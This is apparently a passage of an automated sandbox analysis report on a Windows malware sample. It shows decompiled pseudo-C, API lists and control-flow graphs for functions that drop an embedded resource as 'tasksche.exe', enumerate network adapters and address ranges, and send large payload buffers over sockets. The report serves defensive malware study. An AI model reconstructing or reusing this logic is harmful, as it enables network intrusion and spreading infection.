            0x00407d3c
            0x00407d43
            0x00407d49
            0x00407d4f
            0x00407d55
            0x00407d5b
            0x00407d7a
            0x00407d7e
            0x00407d86
            0x00407d8e
            0x00407d95
            0x00407d9d
            0x00407da1
            0x00407daf
            0x00407db3
            0x00407dc4
            0x00407dc8
            0x00407dca
            0x00407dcc
            0x00407ddb
            0x00407de2
            0x00407def
            0x00407df1
            0x00407e01
            0x00407e18
            0x00407e2c
            0x00407e49
            0x00407e4e
            0x00407e61
            0x00407e68
            0x00407e72
            0x00407e7a
            0x00407e82
            0x00407e8b
            0x00407e95
            0x00407e9b
            0x00407e9f
            0x00407ea8
            0x00407eb0
            0x00407ebb
            0x00407ebc
            0x00407ec6
            0x00407ec7
            0x00407ec8
            0x00407ec9
            0x00407ece
            0x00407ecf
            0x00407ed0
            0x00407ed1
            0x00407ed2
            0x00407ed3
            0x00407edb
            0x00407ee0
            0x00407ef0
            0x00407ef7
            0x00407f02
            0x00407f02
            0x00407ef0
            0x00407e4e
            0x00407db3
            0x00407da1
            0x00407d8e
            0x00407d7e
            0x00407d5b
            0x00407d4f
            0x00407d43
            0x00407f14

            APIs
            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6FD8FB10,?,00000000), ref: 00407CEF
            • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
            • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
            • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
            • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
            • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
            • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
            • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
            • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
            • sprintf.MSVCRT ref: 00407E01
            • sprintf.MSVCRT ref: 00407E18
            • MoveFileExA.KERNEL32 ref: 00407E2C
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: AddressProcResource$sprintf$FileFindHandleLoadLockModuleMoveSizeof
            • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
            • API String ID: 4072214828-1507730452
            • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
            • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
            • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
            • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00409160 Relevance: 31.8, APIs: 21, Instructions: 289memoryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 83 409160-40917b GetAdaptersInfo 84 40917d-409183 83->84 85 4091ae-4091b4 83->85 84->85 86 409185-409196 LocalAlloc 84->86 86->85 87 409198-4091a5 GetAdaptersInfo 86->87 88 4091b5-4091b8 87->88 89 4091a7-4091a8 LocalFree 87->89 90 4091be-4091ca 88->90 89->85 91 4091d0 90->91 92 40937b-409383 90->92 93 4091d6-4091f3 inet_addr * 2 91->93 94 409389-4093a0 92->94 95 4091ba 92->95 96 4091f9-4091fb 93->96 97 40936d-409375 93->97 98 4093a2-4093aa call 409750 94->98 99 4093ac-4093c2 call 409680 call 409750 94->99 95->90 96->97 102 409201-409204 96->102 97->92 103 4091d2 97->103 107 4093e9-4093f3 98->107 99->107 114 4093c4-4093d0 99->114 102->97 106 40920a-40920c 102->106 103->93 106->97 109 409212-409247 call 408e50 call 409470 106->109 111 4093f5-4093fa 107->111 112 409408-40940a 107->112 128 4092a1-4092b7 GetPerAdapterInfo 109->128 129 409249-409257 inet_addr 109->129 111->112 115 4093fc-409402 111->115 117 409431-409438 112->117 120 4093e0-4093e7 114->120 121 4093d2-4093de 114->121 122 409404-409406 115->122 123 40940c-40940e 115->123 118 409448-409469 LocalFree 117->118 119 40943a-409446 117->119 119->118 119->119 120->107 120->114 121->120 121->121 122->111 123->117 125 409410-409419 123->125 125->117 127 40941b-409421 125->127 132 409423-409427 127->132 133 40942a-40942f 127->133 134 409369 128->134 135 4092bd-4092d2 LocalAlloc 128->135 130 409297-40929b 129->130 131 409259-40925b 129->131 130->129 137 40929d 130->137 131->130 136 40925d-40926a call 4090d0 131->136 132->133 133->117 133->127 134->97 138 4092d8-4092f0 GetPerAdapterInfo 135->138 139 40935e-409365 LocalFree 135->139 136->130 144 40926c-409294 htonl * 4 call 408e50 136->144 137->128 138->139 141 4092f2-4092f7 138->141 139->134 141->139 143 4092f9-409307 inet_addr 141->143 145 409354-409358 143->145 146 409309-40930b 143->146 144->130 145->143 148 40935a 145->148 146->145 149 40930d-409318 call 409110 146->149 148->139 149->145 153 40931a-409327 call 4090d0 149->153 153->145 156 409329-409351 htonl * 4 call 408e50 153->156 156->145
            C-Code - Quality: 58%
            			E00409160() {
				void* _t50;
				long _t52;
				void* _t53;
				intOrPtr* _t56;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t62;
				signed char _t68;
				void* _t70;
				void* _t71;
				void* _t72;
				signed char _t73;
				signed char _t74;
				signed char _t77;
				intOrPtr _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr* _t88;
				intOrPtr _t90;
				intOrPtr _t92;
				intOrPtr* _t101;
				intOrPtr _t102;
				intOrPtr* _t103;
				intOrPtr* _t109;
				intOrPtr _t110;
				intOrPtr* _t113;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr* _t116;
				intOrPtr* _t117;
				void* _t118;
				void _t119;
				intOrPtr* _t120;
				intOrPtr _t121;
				intOrPtr _t123;
				void* _t124;
				void* _t125;
				signed char _t126;
				intOrPtr _t128;
				signed int _t130;
				void* _t131;
				void* _t132;

				_t50 = _t131;
				_push(_t50);
				_push(0);
				 *(_t131 + 0xc) = 0;
				L00409810();
				if(_t50 != 0x6f) {
					L5:
					return 0;
				} else {
					_t52 =  *(_t131 + 4);
					if(_t52 == 0) {
						goto L5;
					} else {
						_t53 = LocalAlloc(0, _t52);
						_t118 = _t53;
						 *(_t131 + 8) = _t118;
						if(_t118 == 0) {
							goto L5;
						} else {
							_push(_t131 + 4);
							_push(_t118);
							L00409810();
							if(_t53 == 0) {
								goto L8;
								L9:
								while(1) {
									_push(_t109 + 4);
									L004097D4();
									 *(_t131 + 0x1c) = _t53;
									_t53 = _t109 + 0x14;
									_push(_t53);
									L004097D4();
									_t87 =  *(_t131 + 0x1c);
									if(_t87 != 0xffffffff && _t87 != 0 && _t53 != 0xffffffff && _t53 != 0) {
									}
									L15:
									_t85 = _t53 & _t87;
									_t130 =  !_t53 | _t87;
									_push(_t130);
									E00408E50( *((intOrPtr*)(_t131 + 0x28)), _t85);
									_t92 =  *((intOrPtr*)(_t131 + 0x38));
									_t131 = _t131 + 0xc;
									_push(_t131 + 0x1c);
									_push(1);
									_push( *((intOrPtr*)(_t92 + 8)));
									_t68 = E00409470(_t92);
									_t116 = _t118 + 0x1d4;
									if(_t116 != 0) {
										do {
											_push(_t116 + 4);
											L004097D4();
											_t126 = _t68;
											if(_t126 != 0xffffffff && _t126 != 0) {
												_push(_t130);
												_push(_t85);
												_t68 = E004090D0(_t68, _t126);
												_t131 = _t131 + 0xc;
												if(_t68 == 0) {
													_push(_t126);
													L004097F8();
													_t77 = _t68 | 0x000000ff;
													_push(_t77);
													L004097F2();
													_push(_t77);
													_push(_t126);
													L004097F8();
													_push(_t77 & 0x00000000);
													L004097F2();
													_t68 = E00408E50( *((intOrPtr*)(_t131 + 0x2c)), _t77 & 0x00000000);
													_t131 = _t131 + 0xc;
												}
											}
											_t116 =  *_t116;
										} while (_t116 != 0);
										_t118 =  *(_t131 + 0x14);
									}
									_t53 = _t131 + 0x10;
									_push(_t53);
									_push(0);
									_push( *((intOrPtr*)(_t118 + 0x19c)));
									L0040980A();
									if(_t53 == 0x6f) {
										_t124 = LocalAlloc(0,  *(_t131 + 0x10));
										 *(_t131 + 0x20) = _t124;
										if(_t124 != 0) {
											_t70 = _t131 + 0x10;
											_push(_t70);
											_push(_t124);
											_push( *((intOrPtr*)( *(_t131 + 0x14) + 0x19c)));
											L0040980A();
											if(_t70 != 0) {
												_t28 = _t124 + 0xc; // 0xc
												_t117 = _t28;
												if(_t117 != 0) {
													do {
														_t29 = _t117 + 4; // 0x10
														_t71 = _t29;
														_push(_t71);
														L004097D4();
														_t125 = _t71;
														if(_t125 != 0xffffffff && _t125 != 0) {
															_t72 = E00409110(_t125);
															_t131 = _t131 + 4;
															if(_t72 != 0) {
																_push(_t130);
																_push(_t85);
																_t73 = E004090D0(_t72, _t125);
																_t131 = _t131 + 0xc;
																if(_t73 == 0) {
																	_push(_t125);
																	L004097F8();
																	_t74 = _t73 | 0x000000ff;
																	_push(_t74);
																	L004097F2();
																	_push(_t74);
																	_push(_t125);
																	L004097F8();
																	_push(_t74 & 0x00000000);
																	L004097F2();
																	E00408E50( *((intOrPtr*)(_t131 + 0x2c)), _t74 & 0x00000000);
																	_t131 = _t131 + 0xc;
																}
															}
														}
														_t117 =  *_t117;
													} while (_t117 != 0);
													_t124 =  *(_t131 + 0x20);
												}
											}
										}
										_t53 = LocalFree(_t124);
										_t118 =  *(_t131 + 0x14);
									}
									_t109 =  *((intOrPtr*)(_t131 + 0x18));
									L35:
									_t115 =  *_t109;
									 *((intOrPtr*)(_t131 + 0x18)) = _t115;
									if(_t115 != 0) {
										_t109 =  *((intOrPtr*)(_t131 + 0x18));
										_push(_t109 + 4);
										L004097D4();
										 *(_t131 + 0x1c) = _t53;
										_t53 = _t109 + 0x14;
										_push(_t53);
										L004097D4();
										_t87 =  *(_t131 + 0x1c);
										if(_t87 != 0xffffffff && _t87 != 0 && _t53 != 0xffffffff && _t53 != 0) {
										}
										goto L35;
									}
									break;
								}
								L36:
								_t119 =  *_t118;
								 *(_t131 + 0x14) = _t119;
								if(_t119 != 0) {
									_t118 =  *(_t131 + 0x14);
									L8:
									_t6 = _t118 + 0x1ac; // 0x1ac
									_t109 = _t6;
									 *((intOrPtr*)(_t131 + 0x18)) = _t109;
									if(_t109 != 0) {
										goto L9;
									}
									goto L36;
								}
								_t128 =  *((intOrPtr*)(_t131 + 0x28));
								_push(_t119);
								_t81 =  *((intOrPtr*)(_t128 + 8));
								_t110 =  *((intOrPtr*)(_t128 + 4));
								_push(_t81);
								_push(_t110);
								_t100 = _t81 - _t110 & 0xfffffffc;
								if((_t81 - _t110 & 0xfffffffc) > 0x40) {
									E00409680(_t100);
									_t120 = _t110 + 0x40;
									_push(0);
									E00409750(_t110, _t120);
									_t132 = _t131 + 0x18;
									while(_t120 != _t81) {
										_t114 =  *_t120;
										_t90 =  *((intOrPtr*)(_t120 - 4));
										_t62 = _t120 - 4;
										_t103 = _t120;
										while(_t114 < _t90) {
											 *_t103 = _t90;
											_t90 =  *((intOrPtr*)(_t62 - 4));
											_t103 = _t62;
											_t62 = _t62 - 4;
										}
										_t120 = _t120 + 4;
										 *_t103 = _t114;
									}
								} else {
									E00409750();
									_t132 = _t131 + 0xc;
								}
								_t101 =  *((intOrPtr*)(_t128 + 8));
								_t56 =  *((intOrPtr*)(_t128 + 4));
								_t88 = _t56;
								if(_t56 == _t101) {
									L47:
									_t88 = _t101;
								} else {
									while(1) {
										_t56 = _t56 + 4;
										if(_t56 == _t101) {
											goto L47;
										}
										if( *_t88 ==  *_t56) {
											if(_t88 != _t101) {
												_t113 = _t88;
												_t88 = _t88 + 4;
												_t61 = _t88;
												while(_t61 != _t101) {
													_t123 =  *_t61;
													if( *_t113 != _t123) {
														 *_t88 = _t123;
														_t113 = _t61;
														_t88 = _t88 + 4;
													}
													_t61 = _t61 + 4;
												}
											}
										} else {
											_t88 = _t56;
											continue;
										}
										goto L53;
									}
									goto L47;
								}
								L53:
								_t121 =  *((intOrPtr*)(_t128 + 8));
								_t57 = _t101;
								if(_t101 != _t121) {
									do {
										_t102 =  *_t57;
										_t57 = _t57 + 4;
										 *_t88 = _t102;
										_t88 = _t88 + 4;
									} while (_t57 != _t121);
								}
								 *((intOrPtr*)(_t128 + 8)) = _t88;
								 *((intOrPtr*)(_t132 + 0x28)) =  *((intOrPtr*)(_t128 + 8));
								LocalFree( *(_t132 + 0x14));
								return 1;
							} else {
								LocalFree(_t118);
								goto L5;
							}
						}
					}
				}
			}













































            0x00409163
            0x00409168
            0x00409169
            0x0040916b
            0x00409173
            0x0040917b
            0x004091ae
            0x004091b4
            0x0040917d
            0x0040917d
            0x00409183
            0x00000000
            0x00409185
            0x00409188
            0x0040918e
            0x00409192
            0x00409196
            0x00000000
            0x00409198
            0x0040919c
            0x0040919d
            0x0040919e
            0x004091a5
            0x004091b8
            0x004091d0
            0x004091d6
            0x004091d9
            0x004091da
            0x004091df
            0x004091e3
            0x004091e6
            0x004091e7
            0x004091ec
            0x004091f3
            0x004091f3
            0x00409212
            0x00409218
            0x0040921e
            0x00409220
            0x00409223
            0x00409228
            0x0040922c
            0x00409236
            0x00409237
            0x00409239
            0x0040923a
            0x0040923f
            0x00409247
            0x00409249
            0x0040924c
            0x0040924d
            0x00409252
            0x00409257
            0x0040925d
            0x0040925e
            0x00409260
            0x00409265
            0x0040926a
            0x0040926c
            0x0040926d
            0x00409272
            0x00409274
            0x00409275
            0x0040927a
            0x0040927b
            0x0040927c
            0x00409283
            0x00409284
            0x0040928f
            0x00409294
            0x00409294
            0x0040926a
            0x00409297
            0x00409299
            0x0040929d
            0x0040929d
            0x004092a7
            0x004092ab
            0x004092ac
            0x004092ae
            0x004092af
            0x004092b7
            0x004092ca
            0x004092ce
            0x004092d2
            0x004092dc
            0x004092e0
            0x004092e1
            0x004092e8
            0x004092e9
            0x004092f0
            0x004092f2
            0x004092f2
            0x004092f7
            0x004092f9
            0x004092f9
            0x004092f9
            0x004092fc
            0x004092fd
            0x00409302
            0x00409307
            0x0040930e
            0x00409313
            0x00409318
            0x0040931a
            0x0040931b
            0x0040931d
            0x00409322
            0x00409327
            0x00409329
            0x0040932a
            0x0040932f
            0x00409331
            0x00409332
            0x00409337
            0x00409338
            0x00409339
            0x00409340
            0x00409341
            0x0040934c
            0x00409351
            0x00409351
            0x00409327
            0x00409318
            0x00409354
            0x00409356
            0x0040935a
            0x0040935a
            0x004092f7
            0x004092f0
            0x0040935f
            0x00409365
            0x00409365
            0x00409369
            0x0040936d
            0x0040936d
            0x00409371
            0x00409375
            0x004091d2
            0x004091d9
            0x004091da
            0x004091df
            0x004091e3
            0x004091e6
            0x004091e7
            0x004091ec
            0x004091f3
            0x004091f3
            0x00000000
            0x004091f3
            0x00000000
            0x00409375
            0x0040937b
            0x0040937b
            0x0040937f
            0x00409383
            0x004091ba
            0x004091be
            0x004091be
            0x004091be
            0x004091c6
            0x004091ca
            0x00000000
            0x00000000
            0x00000000
            0x004091ca
            0x00409389
            0x0040938d
            0x0040938e
            0x00409391
            0x00409396
            0x00409399
            0x0040939a
            0x004093a0
            0x004093ac
            0x004093b1
            0x004093b4
            0x004093b8
            0x004093bd
            0x004093c2
            0x004093c4
            0x004093c6
            0x004093c9
            0x004093ce
            0x004093d0
            0x004093d2
            0x004093d4
            0x004093d7
            0x004093d9
            0x004093dc
            0x004093e0
            0x004093e3
            0x004093e5
            0x004093a2
            0x004093a2
            0x004093a7
            0x004093a7
            0x004093e9
            0x004093ec
            0x004093f1
            0x004093f3
            0x00409408
            0x00409408
            0x004093f5
            0x004093f5
            0x004093f5
            0x004093fa
            0x00000000
            0x00000000
            0x00409402
            0x0040940e
            0x00409410
            0x00409412
            0x00409415
            0x00409419
            0x0040941b
            0x00409421
            0x00409423
            0x00409425
            0x00409427
            0x00409427
            0x0040942a
            0x0040942d
            0x00409419
            0x00409404
            0x00409404
            0x00000000
            0x00409404
            0x00000000
            0x00409402
            0x00000000
            0x004093f5
            0x00409431
            0x00409431
            0x00409434
            0x00409438
            0x0040943a
            0x0040943a
            0x0040943c
            0x0040943f
            0x00409441
            0x00409444
            0x0040943a
            0x0040944b
            0x00409452
            0x00409457
            0x00409469
            0x004091a7
            0x004091a8
            0x00000000
            0x004091a8
            0x004091a5
            0x00409196
            0x00409183

            APIs
            • GetAdaptersInfo.IPHLPAPI ref: 00409173
            • LocalAlloc.KERNEL32(00000000,00000000,00000000,?), ref: 00409188
            • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 0040919E
            • LocalFree.KERNEL32(00000000,00000000,?), ref: 004091A8
            • inet_addr.WS2_32(?), ref: 004091DA
            • inet_addr.WS2_32(?), ref: 004091E7
            • inet_addr.WS2_32(?), ref: 0040924D
            • htonl.WS2_32(00000000), ref: 0040926D
            • htonl.WS2_32(00000000), ref: 00409275
            • htonl.WS2_32(00000000), ref: 0040927C
            • htonl.WS2_32(00000000), ref: 00409284
            • GetPerAdapterInfo.IPHLPAPI(?,00000000,?), ref: 004092AF
            • LocalAlloc.KERNEL32(00000000,?,?,00000001,?,?,?,00000000,?), ref: 004092C4
            • GetPerAdapterInfo.IPHLPAPI(?,00000000,?), ref: 004092E9
            • inet_addr.WS2_32(00000010), ref: 004092FD
            • htonl.WS2_32(00000000), ref: 0040932A
            • htonl.WS2_32(00000000), ref: 00409332
            • htonl.WS2_32(00000000), ref: 00409339
            • htonl.WS2_32(00000000), ref: 00409341
            • LocalFree.KERNEL32(00000000,?,?,00000000,?), ref: 0040935F
            • LocalFree.KERNEL32(?,?,?,?,?,00000001,?,?,?,00000000,?), ref: 00409457
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmpDownload File
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: htonl$Local$Infoinet_addr$Free$AdapterAdaptersAlloc
            • String ID:
            • API String ID: 2932872762-0
            • Opcode ID: c11bd2ab7724a74c24a0033fabf222a027c31e263815c656df1c756183d4ce29
            • Instruction ID: db8ce7f248b8b80c9efd5a41f97dd348cfc29eb1c395b7b9fc731d5542502a59
            • Opcode Fuzzy Hash: c11bd2ab7724a74c24a0033fabf222a027c31e263815c656df1c756183d4ce29
            • Instruction Fuzzy Hash: FA91C6726042119BD714DE24C880A6F73A9AF89714F19493EFC55B73C3D739ED028B9A
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00406F50 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 241networkmemoryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 275 406f50-406fc0 call 409860 278 406fc2-406fd2 275->278 279 406fd4-406fdf 275->279 280 406fe4-406ff7 GlobalAlloc 278->280 279->280 281 407292-40729e 280->281 282 406ffd-40701b 280->282 283 407022 282->283 284 40701d-407021 282->284 285 407024-407028 283->285 286 40702a-407040 283->286 284->283 287 407044-40704d 285->287 286->287 288 407074-407095 287->288 289 40704f-407072 287->289 290 407097-4070d7 call 406f00 288->290 289->290 293 4070e1-4070fb 290->293 294 4070d9-4070e0 290->294 295 407101-407105 293->295 296 4071c7-4071c9 293->296 294->293 297 40710b-407182 call 406f00 send 295->297 298 407287-40728c GlobalFree 296->298 299 4071cf-407270 htons call 406f00 send 296->299 297->296 304 407184-40719c recv 297->304 298->281 299->298 305 407272-407282 recv 299->305 304->296 306 40719e-4071a6 304->306 305->298 306->296 307 4071a8-4071c1 306->307 307->296 308 407107 307->308 308->297
            C-Code - Quality: 77%
            			E00406F50(void* __ecx, void* __eflags) {
				void* _t100;
				void* _t103;
				void* _t109;
				short _t116;
				signed int _t121;
				void* _t122;
				void* _t128;
				intOrPtr _t130;
				signed int _t131;
				signed int _t133;
				signed int _t134;
				signed int _t141;
				signed int _t142;
				signed int _t147;
				signed int _t150;
				signed int _t151;
				signed int _t163;
				signed int _t178;
				signed int _t181;
				void* _t219;
				void* _t220;
				signed int _t222;
				void* _t223;
				intOrPtr _t224;
				intOrPtr _t226;
				signed int _t227;
				signed int _t228;
				unsigned int _t229;
				void* _t233;
				void* _t234;
				void* _t235;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t241;
				void* _t244;
				signed int _t249;

				E00409860(0x20e4, __ecx);
				 *((char*)(_t233 + 0x2c)) = 0;
				memset(_t233 + 0x2d, 0, 0x431 << 2);
				_t234 = _t233 + 0xc;
				asm("stosw");
				asm("stosb");
				 *((char*)(_t234 + 0x10f4)) = 0;
				memset(_t234 + 0x10f5, 0, 0x3ff << 2);
				_t235 = _t234 + 0xc;
				asm("stosw");
				asm("stosb");
				 *((intOrPtr*)(_t235 + 0x10)) = 0;
				 *((intOrPtr*)(_t235 + 0x14)) = 0;
				 *((intOrPtr*)(_t235 + 0x11)) = 0;
				 *((intOrPtr*)(_t235 + 0x18)) = 0;
				 *((char*)(_t235 + 0x10)) = 0;
				 *((intOrPtr*)(_t235 + 0x15)) = 0;
				 *((short*)(_t235 + 0x19)) = 0;
				 *((char*)(_t235 + 0x1b)) = 0;
				if( *((intOrPtr*)(_t235 + 0x20fc)) == 0) {
					_t219 =  *0x70f868;
					_t131 = 0x1800;
					_t227 = 0x50d800;
				} else {
					_t219 =  *0x70f864;
					_t131 = 0x1305;
					_t227 = 0x506000;
				}
				_t17 = _t227 + 0xc; // 0x180c
				_t100 = GlobalAlloc(0x40, _t131 + _t17);
				 *(_t235 + 0x20) = _t100;
				if(_t100 == 0) {
					L25:
					return 0;
				} else {
					_t141 = _t227;
					_t142 = _t141 >> 2;
					memcpy(_t100 + _t131, _t219, _t142 << 2);
					_t103 = memcpy(_t219 + _t142 + _t142, _t219, _t141 & 0x00000003);
					_t238 = _t235 + 0x18;
					_t147 = _t131 + _t227;
					_t178 = _t147 & 0x80000003;
					if(_t178 < 0) {
						_t178 = (_t178 - 0x00000001 | 0xfffffffc) + 1;
						_t249 = _t178;
					}
					if(_t249 != 0) {
						asm("cdq");
						 *(_t238 + 0x1c) = 4 + (_t147 + (_t178 & 0x00000003) >> 2) * 4;
						_t103 =  *(_t238 + 0x20);
					} else {
						 *(_t238 + 0x1c) = _t147;
					}
					if( *((intOrPtr*)(_t238 + 0x20fc)) == 0) {
						_t31 = _t227 + 0xf8a; // 0x50e78a
						_t220 = 0x42fa60;
						 *0x4302ce = _t31;
						 *(_t131 + 0x42fa58) = _t227;
						 *((intOrPtr*)(_t131 + 0x42fa5c)) = 1;
						_t150 = _t131;
					} else {
						_t28 = _t227 + 0xd70; // 0x50e570
						_t220 = 0x42e758;
						 *0x42ece9 = _t28;
						 *(_t131 + 0x42e750) = _t227;
						 *((intOrPtr*)(_t131 + 0x42e754)) = 1;
						_t150 = _t131;
					}
					_t151 = _t150 >> 2;
					memcpy(_t103, _t220, _t151 << 2);
					_t239 = _t238 + 0xc;
					_t181 =  *(_t239 + 0x2100);
					_t109 = memcpy(_t220 + _t151 + _t151, _t220, _t150 & 0x00000003);
					_t240 = _t239 + 0xc;
					E00406F00(_t181, _t109,  *((intOrPtr*)(_t240 + 0x1c)));
					_t228 =  *(_t240 + 0x28);
					_t241 = _t240 + 0xc;
					asm("cdq");
					_t133 = _t228 + (_t181 & 0x00000fff) >> 0xc;
					_t229 = _t228 & 0x80000fff;
					if(_t229 < 0) {
						_t229 = (_t229 - 0x00000001 | 0xfffff000) + 1;
					}
					memcpy(_t241 + 0x2c, 0x42e710, 0x11 << 2);
					_t235 = _t241 + 0xc;
					asm("movsw");
					_t222 = 0;
					 *((intOrPtr*)(_t235 + 0x28)) = 0;
					if(_t133 <= 0) {
						L21:
						if(_t229 > 0) {
							_t116 = _t229 + 0x4e;
							_push(_t116);
							L004097CE();
							 *((short*)(_t235 + 0x2e)) = _t116;
							 *((short*)(_t235 + 0x6f)) = _t229 + 0xd;
							_t134 = _t133 << 0xc;
							 *(_t235 + 0x5f) = _t229;
							 *(_t235 + 0x73) = _t229;
							 *(_t235 + 0x20) = _t229;
							 *(_t235 + 0x24) = _t134;
							E00406F00( *((intOrPtr*)(_t235 + 0x2100)), _t235 + 0x10, 0xc);
							 *(_t235 + 0x86) =  *(_t235 + 0x24);
							 *((intOrPtr*)(_t235 + 0x7e)) =  *((intOrPtr*)(_t235 + 0x1c));
							 *(_t235 + 0x82) =  *(_t235 + 0x20);
							_t223 = _t134 +  *((intOrPtr*)(_t235 + 0x2c));
							_t163 = _t229 >> 2;
							_t121 = memcpy(_t235 + 0x8a, _t223, _t163 << 2);
							_push(0);
							_t122 = memcpy(_t223 + _t163 + _t163, _t223, _t121 & 0x00000003);
							_t235 = _t235 + 0x24;
							_t224 =  *((intOrPtr*)(_t235 + 0x20fc));
							_push(_t229 + 0x52);
							_push(_t235 + 0x30);
							_push(_t224);
							L004097BC();
							if(_t122 != 0xffffffff) {
								_push(0);
								_push(0x1000);
								_push(_t235 + 0x10f8);
								_push(_t224);
								L004097B6();
							}
						}
						GlobalFree( *(_t235 + 0x20));
						goto L25;
					} else {
						 *(_t235 + 0x24) = 0;
						while(1) {
							 *((intOrPtr*)(_t235 + 0x10)) =  *((intOrPtr*)(_t235 + 0x1c));
							 *(_t235 + 0x20) = 0x1000;
							 *(_t235 + 0x24) = _t222;
							E00406F00( *((intOrPtr*)(_t235 + 0x2100)), _t235 + 0x10, 0xc);
							 *((intOrPtr*)(_t235 + 0x7e)) =  *((intOrPtr*)(_t235 + 0x1c));
							 *(_t235 + 0x82) =  *(_t235 + 0x20);
							_t244 = _t235 + 0xc;
							 *(_t244 + 0x7a) =  *(_t235 + 0x24);
							_t128 = memcpy(_t235 + 0x8a, _t222 +  *((intOrPtr*)(_t235 + 0x2c)), 0x400 << 2);
							_t235 = _t244 + 0xc;
							_t226 =  *((intOrPtr*)(_t235 + 0x20f8));
							_push(0);
							_push(0x1052);
							_push(_t235 + 0x30);
							_push(_t226);
							L004097BC();
							if(_t128 == 0xffffffff) {
								goto L21;
							}
							_push(0);
							_push(0x1000);
							_push(_t235 + 0x10f8);
							_push(_t226);
							L004097B6();
							if(_t128 != 0xffffffff &&  *((char*)(_t235 + 0x1116)) == 0x52) {
								_t130 =  *((intOrPtr*)(_t235 + 0x28)) + 1;
								 *((intOrPtr*)(_t235 + 0x28)) = _t130;
								 *(_t235 + 0x24) = 0x1000 +  *(_t235 + 0x24);
								if(_t130 < _t133) {
									_t222 =  *(_t235 + 0x24);
									continue;
								}
							}
							goto L21;
						}
						goto L21;
					}
				}
			}








































            0x00406f55
            0x00406f69
            0x00406f6e
            0x00406f6e
            0x00406f70
            0x00406f72
            0x00406f81
            0x00406f89
            0x00406f89
            0x00406f8b
            0x00406f8d
            0x00406f92
            0x00406f9a
            0x00406f9e
            0x00406fa2
            0x00406fa6
            0x00406fb1
            0x00406fb5
            0x00406fbc
            0x00406fc0
            0x00406fd4
            0x00406fda
            0x00406fdf
            0x00406fc2
            0x00406fc2
            0x00406fc8
            0x00406fcd
            0x00406fcd
            0x00406fe4
            0x00406feb
            0x00406ff3
            0x00406ff7
            0x00407295
            0x0040729e
            0x00406ffd
            0x00406ffd
            0x00407004
            0x00407007
            0x0040700e
            0x0040700e
            0x00407010
            0x00407015
            0x0040701b
            0x00407021
            0x00407021
            0x00407021
            0x00407022
            0x0040702c
            0x0040703c
            0x00407040
            0x00407024
            0x00407024
            0x00407024
            0x0040704d
            0x00407074
            0x0040707a
            0x0040707f
            0x00407085
            0x0040708b
            0x00407095
            0x0040704f
            0x0040704f
            0x00407055
            0x0040705a
            0x00407060
            0x00407066
            0x00407070
            0x00407070
            0x0040709b
            0x0040709e
            0x0040709e
            0x004070a2
            0x004070ac
            0x004070ac
            0x004070b5
            0x004070ba
            0x004070be
            0x004070c3
            0x004070ce
            0x004070d1
            0x004070d7
            0x004070e0
            0x004070e0
            0x004070ef
            0x004070ef
            0x004070f1
            0x004070f3
            0x004070f7
            0x004070fb
            0x004071c7
            0x004071c9
            0x004071cf
            0x004071d2
            0x004071d3
            0x004071df
            0x004071e4
            0x004071f7
            0x004071fb
            0x00407200
            0x00407209
            0x0040720d
            0x00407211
            0x00407222
            0x00407229
